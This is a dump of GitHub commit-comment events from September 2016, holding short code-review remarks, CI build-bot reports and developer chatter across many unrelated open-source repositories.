{"id":"4572482787","type":"CommitCommentEvent","actor":{"login":"ucef90000"},"repo":{"name":"ucef90000/ucef9"},"payload":{"comment":{"id":19049482,"position":null,"line":null,"path":null,"commit_id":"a93e7e55b47a3cdb73a2a663831d0dfc26a5d7ca","created_at":"2016-09-16T07:01:08Z","updated_at":"2016-09-16T07:01:08Z","body":"bonjour tout mond"}},"created_at":"2016-09-16T07:01:08Z"}
{"id":"4572485899","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049494,"position":32,"line":67,"path":"app/controllers/feeds_controller.rb","commit_id":"57c58b8a396aec69142eb5e94861e810912ddc9c","created_at":"2016-09-16T07:02:06Z","updated_at":"2016-09-16T07:02:06Z","body":"I notice `current_user.feeds` 4 times. How would you dry it up?"}},"created_at":"2016-09-16T07:02:06Z"}
{"id":"4572486159","type":"CommitCommentEvent","actor":{"login":"aloiscochard"},"repo":{"name":"tdroxler/sarsi"},"payload":{"comment":{"id":19049496,"position":27,"line":39,"path":"sarsi.cabal","commit_id":"84c1974ab176f54c92aac94d6b49bf1f505e2b83","created_at":"2016-09-16T07:02:11Z","updated_at":"2016-09-16T07:02:11Z","body":"Does it build using stack and `>= 1.0 & & < 1.1` as a constraint? "}},"created_at":"2016-09-16T07:02:11Z"}
{"id":"4572486662","type":"CommitCommentEvent","actor":{"login":"Ev0-BH"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19049500,"position":null,"line":null,"path":null,"commit_id":"b990c306194ef024f43b24da7c720144100878e2","created_at":"2016-09-16T07:02:19Z","updated_at":"2016-09-16T07:02:19Z","body":"Reverted for now, because ATV did.\r\n\r\nNew image build was ok and working without issue's, but I did not have a chance to do an online update test, before our nightly build server run and didn't want to risk any problems."}},"created_at":"2016-09-16T07:02:19Z"}
{"id":"4572487766","type":"CommitCommentEvent","actor":{"login":"Jonathan50"},"repo":{"name":"Jonathan50/do-it"},"payload":{"comment":{"id":19049504,"position":null,"line":null,"path":null,"commit_id":"3d33a73a3e681cf329ff87459c19bfaa8e10055f","created_at":"2016-09-16T07:02:39Z","updated_at":"2016-09-16T07:02:39Z","body":"lol 101 commits"}},"created_at":"2016-09-16T07:02:39Z"}
{"id":"4572488257","type":"CommitCommentEvent","actor":{"login":"jypma"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19049507,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T07:02:48Z","updated_at":"2016-09-16T07:02:48Z","body":"Thanks a lot for all of your replies, that's a lot of useful stuff! I'll definitely be looking into xpcc, hadn't come across that yet. I'm looking especially forward to see how xpcc handles interrupts; I had quite a touch time coming up with a (now very) clean way of allowing classes to define interrupt handlers, yet have them be statically known at compile time so avr-gcc can fully inline them. \r\n\r\nI'll keep you posted! "}},"created_at":"2016-09-16T07:02:48Z"}
{"id":"4572491151","type":"CommitCommentEvent","actor":{"login":"freanux"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19049514,"position":null,"line":null,"path":null,"commit_id":"b9a97ed560c7bba09e07bd36b1bb1abd8b1f8dcc","created_at":"2016-09-16T07:03:40Z","updated_at":"2016-09-16T07:03:40Z","body":"Well well, I think I should leave my hands off for a moment ;)"}},"created_at":"2016-09-16T07:03:40Z"}
{"id":"4572497098","type":"CommitCommentEvent","actor":{"login":"payberah"},"repo":{"name":"payberah/id2221"},"payload":{"comment":{"id":19049540,"position":4,"line":346,"path":"lab1/lab1.md","commit_id":"dbffaa08aa952cbd80b2a2b9153dde4c0030cd70","created_at":"2016-09-16T07:05:37Z","updated_at":"2016-09-16T07:05:37Z","body":"Yes, it's OK."}},"created_at":"2016-09-16T07:05:37Z"}
{"id":"4572501079","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049557,"position":32,"line":67,"path":"app/controllers/feeds_controller.rb","commit_id":"57c58b8a396aec69142eb5e94861e810912ddc9c","created_at":"2016-09-16T07:06:39Z","updated_at":"2016-09-16T07:06:39Z","body":"@dira I could have created a helper method."}},"created_at":"2016-09-16T07:06:39Z"}
{"id":"4572501391","type":"CommitCommentEvent","actor":{"login":"bastimeyer"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19049561,"position":null,"line":null,"path":null,"commit_id":"039630be189b8edd4039338c8a3c12ddcf4253ce","created_at":"2016-09-16T07:06:46Z","updated_at":"2016-09-16T07:06:46Z","body":"Sorry for the trouble, but there has been another issue that required me to publish another hotfix. 😞 😿 \r\n@InfernoZeus @scowalt @NGMarmaduke \r\nThanks a lot!"}},"created_at":"2016-09-16T07:06:46Z"}
{"id":"4572501443","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19049562,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T07:06:47Z","updated_at":"2016-09-16T07:06:47Z","body":"No you are not in platform here. You should change all the ${project.version} you introduced with ${platform.version}."}},"created_at":"2016-09-16T07:06:47Z"}
{"id":"4572505019","type":"CommitCommentEvent","actor":{"login":"koivo"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19049589,"position":null,"line":null,"path":null,"commit_id":"b990c306194ef024f43b24da7c720144100878e2","created_at":"2016-09-16T07:08:02Z","updated_at":"2016-09-16T07:08:02Z","body":"For this case, we sync the new feed to different folder and try it before.\r\nYou must only change the feed adresses within you opkg configs.\r\nAfter testing we copy to new feed to the correct URL.\r\nSo we can try the feed with updates on some boxes, but without crashing the images of all users."}},"created_at":"2016-09-16T07:08:02Z"}
{"id":"4572506801","type":"CommitCommentEvent","actor":{"login":"publicJorn"},"repo":{"name":"iurii-kyrylenko/angular2-webpack"},"payload":{"comment":{"id":19049592,"position":20,"line":13,"path":"src/app/app.routing.ts","commit_id":"84a3c94e87de1cd30ac94a30f5c998c3bd7515d7","created_at":"2016-09-16T07:08:38Z","updated_at":"2016-09-16T07:08:38Z","body":"Ah, I suspected TS, but I wasn't aware of the as-syntax. I'm very new to this.. Thanks for clarifying!"}},"created_at":"2016-09-16T07:08:38Z"}
{"id":"4572509356","type":"CommitCommentEvent","actor":{"login":"olistik"},"repo":{"name":"comune-desio/azuredesio"},"payload":{"comment":{"id":19049595,"position":null,"line":null,"path":null,"commit_id":"2c4b6a6b95f17ac89cb68d9555cbc888ae3a4195","created_at":"2016-09-16T07:09:32Z","updated_at":"2016-09-16T07:09:32Z","body":"@ipersoft do you like this style? :-)"}},"created_at":"2016-09-16T07:09:32Z"}
{"id":"4572513303","type":"CommitCommentEvent","actor":{"login":"vitalikdanchenko"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19049605,"position":5,"line":117,"path":"saas.html","commit_id":"13e0dce939889e5e242820023ddc6819a5babad2","created_at":"2016-09-16T07:10:50Z","updated_at":"2016-09-16T07:10:50Z","body":"@iurevych if you wanted not to update version on docs page you should have modified `integration\\docs.version` file"}},"created_at":"2016-09-16T07:10:50Z"}
{"id":"4572515050","type":"CommitCommentEvent","actor":{"login":"FrancescAlted"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19049615,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T07:11:27Z","updated_at":"2016-09-16T07:11:27Z","body":"I on't know the reasons why numpydoc is vendored in PyTables, but I agree that we should use upstream package instead."}},"created_at":"2016-09-16T07:11:27Z"}
{"id":"4572524990","type":"CommitCommentEvent","actor":{"login":"Ev0-BH"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19049633,"position":null,"line":null,"path":null,"commit_id":"b990c306194ef024f43b24da7c720144100878e2","created_at":"2016-09-16T07:14:38Z","updated_at":"2016-09-16T07:14:38Z","body":"Unfortunately I do not have access to run our server, so in this case I could not run the update to test, before the server automatically runs.\r\n\r\nI could not get hold of anyone to manually run the server to test it either, therefore I reverted the commit, just in case it caused problems for our users."}},"created_at":"2016-09-16T07:14:38Z"}
{"id":"4572529228","type":"CommitCommentEvent","actor":{"login":"mixman"},"repo":{"name":"futurice/facegame"},"payload":{"comment":{"id":19049638,"position":5,"line":13,"path":"facegame/settings/settings.py","commit_id":"9357700a85e96834e34dc41fb491453e1d9fadcb","created_at":"2016-09-16T07:16:02Z","updated_at":"2016-09-16T07:16:02Z","body":"For easier switching:\r\nDEBUG = os.getenv('DEBUG', 'false').lower() == 'true'"}},"created_at":"2016-09-16T07:16:02Z"}
{"id":"4572532985","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19049648,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T07:17:21Z","updated_at":"2016-09-16T07:17:21Z","body":"ah sorry I was looking at the wrong pom (was misled by the commit comment). Fixing."}},"created_at":"2016-09-16T07:17:21Z"}
{"id":"4572534516","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19049649,"position":16,"line":47,"path":"static/js/services/select2-search.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-16T07:17:55Z","updated_at":"2016-09-16T07:17:55Z","body":"I don't follow your _guidelines_ man, I follow my ❤️ !"}},"created_at":"2016-09-16T07:17:55Z"}
{"id":"4572534703","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":19049652,"position":null,"line":null,"path":null,"commit_id":"956a9696bbcc0447ed63205a42e6179609195fc8","created_at":"2016-09-16T07:17:58Z","updated_at":"2016-09-16T07:17:58Z","body":"@AdSchellevis good morning :) I have made these changes to make the plugin ready for stock 16.7.x with this, changing the name while at it to keep it simple. That's why I initially asked about the firmware loader layer that could be handled with a few shell lines. I still like the firmware loader layer, but I have some design choices upside down now, so I am going to change that in -devel (the files should not be the key, they should just be files and their content simply merged into loader.conf)"}},"created_at":"2016-09-16T07:17:58Z"}
{"id":"4572536498","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19049654,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T07:18:33Z","updated_at":"2016-09-16T07:18:33Z","body":"I was misled because these 3 deps are also in the packager plugin (I copied them to enterprise and platform distribution, hence the mistake)"}},"created_at":"2016-09-16T07:18:33Z"}
{"id":"4572537738","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19049656,"position":7,"line":88,"path":"tests/protractor/e2e/send-message.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-16T07:18:53Z","updated_at":"2016-09-16T07:18:53Z","body":"Yeah, ideally I think the test makes sure it's not already there, to be explicit about the transition it expects to occur (not there -> click -> there)."}},"created_at":"2016-09-16T07:18:53Z"}
{"id":"4572538296","type":"CommitCommentEvent","actor":{"login":"MarlonkJackson"},"repo":{"name":"MarlonkJackson/fan-page"},"payload":{"comment":{"id":19049659,"position":null,"line":null,"path":null,"commit_id":"c9420719de4dfc3f54e47c8cbf7f97f38b8544e7","created_at":"2016-09-16T07:19:04Z","updated_at":"2016-09-16T07:19:04Z","body":"I had l hard time pushing this file to github, but thanks to my instructor I was able to manipulate the git shell into revealing a new command on shell, Commit -a!"}},"created_at":"2016-09-16T07:19:04Z"}
{"id":"4572538539","type":"CommitCommentEvent","actor":{"login":"Lavoaster"},"repo":{"name":"Poniverse/Poniverse.net"},"payload":{"comment":{"id":19049660,"position":null,"line":null,"path":null,"commit_id":"8d05b53e7a22d7b41cc7bf468653e9aa097efaba","created_at":"2016-09-16T07:19:09Z","updated_at":"2016-09-16T07:19:09Z","body":"@LabLayers Spent way too long with @CodesignDev trying to debug why [this](https://github.com/Poniverse/Poniverse.net/commit/8d05b53e7a22d7b41cc7bf468653e9aa097efaba#diff-f0af8f2101d1133216cbcc8ab56ad67dR35) line wasn't firing. It was because I kept using `isLoggedIn` to reference something that was actually `loggedIn`."}},"created_at":"2016-09-16T07:19:09Z"}
{"id":"4572538905","type":"CommitCommentEvent","actor":{"login":"myui"},"repo":{"name":"amaya382/hivemall"},"payload":{"comment":{"id":19049661,"position":12,"line":12,"path":"core/src/main/java/hivemall/ftvec/selection/ChiSquareTestUDF.java","commit_id":"368324fec2dc7f8ecc423103c5e6c45edc573d18","created_at":"2016-09-16T07:19:16Z","updated_at":"2016-09-16T07:19:16Z","body":"note formatted"}},"created_at":"2016-09-16T07:19:16Z"}
{"id":"4572540544","type":"CommitCommentEvent","actor":{"login":"myui"},"repo":{"name":"amaya382/hivemall"},"payload":{"comment":{"id":19049663,"position":1,"line":1,"path":"core/src/main/java/hivemall/ftvec/selection/ChiSquareTestUDF.java","commit_id":"368324fec2dc7f8ecc423103c5e6c45edc573d18","created_at":"2016-09-16T07:19:43Z","updated_at":"2016-09-16T07:19:43Z","body":"add license header"}},"created_at":"2016-09-16T07:19:43Z"}
{"id":"4572541754","type":"CommitCommentEvent","actor":{"login":"myui"},"repo":{"name":"amaya382/hivemall"},"payload":{"comment":{"id":19049671,"position":11,"line":11,"path":"core/src/main/java/hivemall/ftvec/selection/ChiSquareUDF.java","commit_id":"368324fec2dc7f8ecc423103c5e6c45edc573d18","created_at":"2016-09-16T07:20:04Z","updated_at":"2016-09-16T07:20:04Z","body":"add blank line"}},"created_at":"2016-09-16T07:20:04Z"}
{"id":"4572542199","type":"CommitCommentEvent","actor":{"login":"myui"},"repo":{"name":"amaya382/hivemall"},"payload":{"comment":{"id":19049674,"position":10,"line":10,"path":"core/src/main/java/hivemall/ftvec/selection/ChiSquareUDF.java","commit_id":"368324fec2dc7f8ecc423103c5e6c45edc573d18","created_at":"2016-09-16T07:20:12Z","updated_at":"2016-09-16T07:20:12Z","body":"final"}},"created_at":"2016-09-16T07:20:12Z"}
{"id":"4572542964","type":"CommitCommentEvent","actor":{"login":"ipersoft"},"repo":{"name":"comune-desio/azuredesio"},"payload":{"comment":{"id":19049675,"position":null,"line":null,"path":null,"commit_id":"2c4b6a6b95f17ac89cb68d9555cbc888ae3a4195","created_at":"2016-09-16T07:20:25Z","updated_at":"2016-09-16T07:20:25Z","body":"Si,  ma magari mettiamo in un file a parte per essere condiviso con le pagine del meteo"}},"created_at":"2016-09-16T07:20:25Z"}
{"id":"4572545875","type":"CommitCommentEvent","actor":{"login":"myui"},"repo":{"name":"amaya382/hivemall"},"payload":{"comment":{"id":19049680,"position":20,"line":20,"path":"core/src/main/java/hivemall/ftvec/selection/DissociationDegreeUDF.java","commit_id":"368324fec2dc7f8ecc423103c5e6c45edc573d18","created_at":"2016-09-16T07:21:25Z","updated_at":"2016-09-16T07:21:25Z","body":"No need to provide Desription annotation. Explain it in Javadoc comment."}},"created_at":"2016-09-16T07:21:25Z"}
{"id":"4572546572","type":"CommitCommentEvent","actor":{"login":"haraldschilly"},"repo":{"name":"sagemathinc/smc"},"payload":{"comment":{"id":19049683,"position":48,"line":1009,"path":"src/smc-webapp/project_store.coffee","commit_id":"395203e07a7582b07d6f4b24f4901264cd819022","created_at":"2016-09-16T07:21:39Z","updated_at":"2016-09-16T07:21:39Z","body":"that must be `time: opts.sort_by_time`"}},"created_at":"2016-09-16T07:21:39Z"}
{"id":"4572548702","type":"CommitCommentEvent","actor":{"login":"myui"},"repo":{"name":"amaya382/hivemall"},"payload":{"comment":{"id":19049685,"position":28,"line":209,"path":"core/src/main/java/hivemall/utils/math/StatsUtils.java","commit_id":"368324fec2dc7f8ecc423103c5e6c45edc573d18","created_at":"2016-09-16T07:22:19Z","updated_at":"2016-09-16T07:22:19Z","body":"use `0.d` and `1.d` for double literals to follow our convention."}},"created_at":"2016-09-16T07:22:19Z"}
{"id":"4572552495","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19049691,"position":7,"line":481,"path":"xwiki-platform-core/pom.xml","commit_id":"3daa8fed88ea9e4727b1326739474e37afa03fae","created_at":"2016-09-16T07:23:27Z","updated_at":"2016-09-16T07:23:27Z","body":"IMO this is not the right justification. A better justification is that this a young API, i.e an unstable one and thus we don't break our contract of api stability. See https://github.com/xwiki/xwiki-platform/blob/1945729fc1b6500629a5889102a00b070cd5b2f7/xwiki-platform-core/xwiki-platform-skin/xwiki-platform-skin-api/src/main/java/org/xwiki/skin/Resource.java#L28-L28"}},"created_at":"2016-09-16T07:23:27Z"}
{"id":"4572554032","type":"CommitCommentEvent","actor":{"login":"Hmeedo"},"repo":{"name":"ParsePlatform/parse-server-example"},"payload":{"comment":{"id":19049699,"position":null,"line":null,"path":null,"commit_id":"474a310bcaafec5d7567e7d9da408160ede5ce6e","created_at":"2016-09-16T07:23:54Z","updated_at":"2016-09-16T07:23:54Z","body":"removed"}},"created_at":"2016-09-16T07:23:54Z"}
{"id":"4572558296","type":"CommitCommentEvent","actor":{"login":"haraldschilly"},"repo":{"name":"sagemathinc/smc"},"payload":{"comment":{"id":19049705,"position":49,"line":1010,"path":"src/smc-webapp/project_store.coffee","commit_id":"395203e07a7582b07d6f4b24f4901264cd819022","created_at":"2016-09-16T07:25:12Z","updated_at":"2016-09-16T07:25:12Z","body":"`opts.hidden`"}},"created_at":"2016-09-16T07:25:12Z"}
{"id":"4572560810","type":"CommitCommentEvent","actor":{"login":"wsrf16"},"repo":{"name":"wsrf16/MQGhost"},"payload":{"comment":{"id":19049712,"position":null,"line":null,"path":null,"commit_id":"57ba8dfab5711ef621c54806f997cc6cf31ff441","created_at":"2016-09-16T07:25:58Z","updated_at":"2016-09-16T07:25:58Z","body":"Initial"}},"created_at":"2016-09-16T07:25:58Z"}
{"id":"4572560963","type":"CommitCommentEvent","actor":{"login":"SwathiVarkala"},"repo":{"name":"Bahmni/openmrs-module-bahmniapps"},"payload":{"comment":{"id":19049714,"position":null,"line":null,"path":null,"commit_id":"14f8cf7fd891d1ae2972a60242415bce307e9b26","created_at":"2016-09-16T07:26:02Z","updated_at":"2016-09-16T07:26:02Z","body":"@vikashgupta2000 , @Bijayini : Is this cherry picked on to master?"}},"created_at":"2016-09-16T07:26:02Z"}
{"id":"4572561743","type":"CommitCommentEvent","actor":{"login":"liuqingwei92"},"repo":{"name":"liuqingwei92/one"},"payload":{"comment":{"id":19049716,"position":null,"line":null,"path":null,"commit_id":"51f3d5e03d32fb15c0914425da62f14faf327410","created_at":"2016-09-16T07:26:15Z","updated_at":"2016-09-16T07:26:15Z","body":"第一个修改"}},"created_at":"2016-09-16T07:26:15Z"}
{"id":"4572561864","type":"CommitCommentEvent","actor":{"login":"sintaxi"},"repo":{"name":"filipesilva/harp"},"payload":{"comment":{"id":19049717,"position":null,"line":null,"path":null,"commit_id":"bf9030cb1ac2a6035bae3da9afbdab4990011370","created_at":"2016-09-16T07:26:18Z","updated_at":"2016-09-16T07:26:18Z","body":"Thanks for catching this. I just cut `harp@0.21.0-pre.1` with this fix."}},"created_at":"2016-09-16T07:26:18Z"}
{"id":"4572563161","type":"CommitCommentEvent","actor":{"login":"sintaxi"},"repo":{"name":"filipesilva/harp"},"payload":{"comment":{"id":19049719,"position":null,"line":null,"path":null,"commit_id":"bf9030cb1ac2a6035bae3da9afbdab4990011370","created_at":"2016-09-16T07:26:43Z","updated_at":"2016-09-16T07:26:43Z","body":"...`npm install -g harp@next` to install"}},"created_at":"2016-09-16T07:26:43Z"}
{"id":"4572565787","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19049726,"position":null,"line":null,"path":null,"commit_id":"a07d282b31be1d17f4fba6b65aadc7862cf9db41","created_at":"2016-09-16T07:27:34Z","updated_at":"2016-09-16T07:27:34Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2289 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.6%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T07:27:34Z"}
{"id":"4572568492","type":"CommitCommentEvent","actor":{"login":"tano14"},"repo":{"name":"Borlon/ArruiBack"},"payload":{"comment":{"id":19049740,"position":23,"line":64,"path":"rest-module/src/main/java/com/umu/arrui/rest/ArruiController.java","commit_id":"4817d265dcfede976811378e3a045935f29057a2","created_at":"2016-09-16T07:28:22Z","updated_at":"2016-09-16T07:28:22Z","body":"Esto esta bien. Pero lo que te había recomendado es que lo crearas en su propio controller. Asi queda todo esto en un solo lugar y no mezclamos con el controller bueno."}},"created_at":"2016-09-16T07:28:22Z"}
{"id":"4572569095","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19049741,"position":11,"line":20730,"path":"src/server/game/Entities/Player/Player.cpp","commit_id":"9d5da3dd37103f368a914a4a70dc9f847e743761","created_at":"2016-09-16T07:28:33Z","updated_at":"2016-09-16T07:28:33Z","body":"have this change, together with the one in the previous commit, affected in a bad way any new script or proc?"}},"created_at":"2016-09-16T07:28:33Z"}
{"id":"4572571494","type":"CommitCommentEvent","actor":{"login":"Nirgalz"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":19049750,"position":null,"line":null,"path":null,"commit_id":"278714bb0c33dad45651b29172e7a6b06a418e1e","created_at":"2016-09-16T07:29:19Z","updated_at":"2016-09-16T07:29:19Z","body":"Bonjour,\r\nJe ne comprends pas ce que vous voulez dire par : \r\n> MVC à vérifier et corriger : cities, dpts,  EventsEquipments, events_tems, events_vehicle, teams, \r\n"}},"created_at":"2016-09-16T07:29:19Z"}
{"id":"4572572431","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19049759,"position":32,"line":731,"path":"src/server/scripts/Spells/spell_paladin.cpp","commit_id":"5b70b89cc2e4082a9953e2212b830581e767a8bd","created_at":"2016-09-16T07:29:36Z","updated_at":"2016-09-16T07:29:36Z","body":"this is the only change I dont completely understand\r\nwhy did u validate this on the spell proc? xd"}},"created_at":"2016-09-16T07:29:36Z"}
{"id":"4572575231","type":"CommitCommentEvent","actor":{"login":"tano14"},"repo":{"name":"Borlon/ArruiBack"},"payload":{"comment":{"id":19049773,"position":77,"line":77,"path":"service-module/src/main/java/com/umu/arrui/service/impl/ArruiServiceTestImpl.java","commit_id":"4817d265dcfede976811378e3a045935f29057a2","created_at":"2016-09-16T07:30:23Z","updated_at":"2016-09-16T07:30:23Z","body":"Aca habiamos quedado en llamar al save del service."}},"created_at":"2016-09-16T07:30:23Z"}
{"id":"4572578742","type":"CommitCommentEvent","actor":{"login":"Stadly"},"repo":{"name":"tijsverkoyen/CssToInlineStyles"},"payload":{"comment":{"id":19049792,"position":null,"line":null,"path":null,"commit_id":"e7d45286a41bd43ae6acba96e9c5412218c8c6e3","created_at":"2016-09-16T07:31:26Z","updated_at":"2016-09-16T07:31:26Z","body":"If a property was set in the stylesheet, the inline style would not be positioned last, but take place according to the position of the inlined property. This could lead to errors in some cases:\r\n\r\n    <style type=\"text/css\">\r\n    span.test {\r\n       background-color: green;\r\n    }\r\n    span {\r\n       background: red;\r\n    }\r\n    </style>\r\n    <span class=\"test\" style=\"background: blue\">This should be blue</span>\r\n\r\nWould result in `<span style=\"background: blue; background-color: green;\">This should be blue</span>` since `background` has lower specificity than `background-color`, and the inline style would overwrite the value of `background` while keeping the same position. This issue is fixed by positioning the styles that were already inline last."}},"created_at":"2016-09-16T07:31:26Z"}
{"id":"4572579759","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19049794,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T07:31:43Z","updated_at":"2016-09-16T07:31:43Z","body":"Wow, that's a very nice interrupt concept!! I tried something like this with aliasing, but failed miserably. But this is useful even on Cortex-M. Very cool!"}},"created_at":"2016-09-16T07:31:43Z"}
{"id":"4572583340","type":"CommitCommentEvent","actor":{"login":"h13ronim"},"repo":{"name":"pr0d1r2/plexus"},"payload":{"comment":{"id":19049812,"position":1,"line":1,"path":"bash_profile.d/osx_fix_standard_packages.sh","commit_id":"0cee441e439f9abc85ed1e36f3c83ee8c1a62326","created_at":"2016-09-16T07:32:44Z","updated_at":"2016-09-16T07:32:44Z","body":"`bash_profile.d/` ?"}},"created_at":"2016-09-16T07:32:44Z"}
{"id":"4572587165","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19049822,"position":349,"line":3013,"path":"Carbonite.Quests/NxQuest.lua","commit_id":"5c5002d75cc3e3bc5b134b68a6a8304a37d25217","created_at":"2016-09-16T07:33:56Z","updated_at":"2016-09-16T07:33:56Z","body":"Hmm tested RecordQuestLog at the end of SortQuestDB and on 3 toons no errors... hmmm... weird."}},"created_at":"2016-09-16T07:33:56Z"}
{"id":"4572587374","type":"CommitCommentEvent","actor":{"login":"abhi18av"},"repo":{"name":"abhi18av/wolfram-mode"},"payload":{"comment":{"id":19049824,"position":null,"line":null,"path":null,"commit_id":"17864565a4d07419319614ea3f8cd10e4bc8b96e","created_at":"2016-09-16T07:33:59Z","updated_at":"2016-09-16T07:33:59Z","body":"still unable to correct the error \r\n\r\n\r\n```\r\nEntering directory `/Users/eklavya/.emacs.d/elpa/wolfram-mode-20140118.757/'\r\nwolfram-mode.el:128:1:Error: Invalid read syntax: \"] in a list\"\r\n\f\r\nCompiling no file at Fri Sep 16 12:25:34 2016\r\n\r\n```"}},"created_at":"2016-09-16T07:33:59Z"}
{"id":"4572590849","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19049833,"position":null,"line":null,"path":null,"commit_id":"a07d282b31be1d17f4fba6b65aadc7862cf9db41","created_at":"2016-09-16T07:35:03Z","updated_at":"2016-09-16T07:35:03Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-16T07:35:03Z"}
{"id":"4572591540","type":"CommitCommentEvent","actor":{"login":"pyeng"},"repo":{"name":"pyeng/edu_py_net"},"payload":{"comment":{"id":19049838,"position":null,"line":null,"path":null,"commit_id":"29efd448b3e7eec7e7653729ca65c3155fb7298a","created_at":"2016-09-16T07:35:15Z","updated_at":"2016-09-16T07:35:15Z","body":"print \"test\""}},"created_at":"2016-09-16T07:35:15Z"}
{"id":"4572594328","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19049849,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T07:36:06Z","updated_at":"2016-09-16T07:36:06Z","body":"ASIHPValidation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2370 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T07:36:06Z"}
{"id":"4572594459","type":"CommitCommentEvent","actor":{"login":"FROZTEN"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19049851,"position":null,"line":null,"path":null,"commit_id":"d98025c8d938d19c80e04fa3bb86e021a8f0bb7d","created_at":"2016-09-16T07:36:08Z","updated_at":"2016-09-16T07:36:08Z","body":"What i need to do when dynamic vehicles not spawning?\r\n\r\n(sorry for my crappy english)"}},"created_at":"2016-09-16T07:36:08Z"}
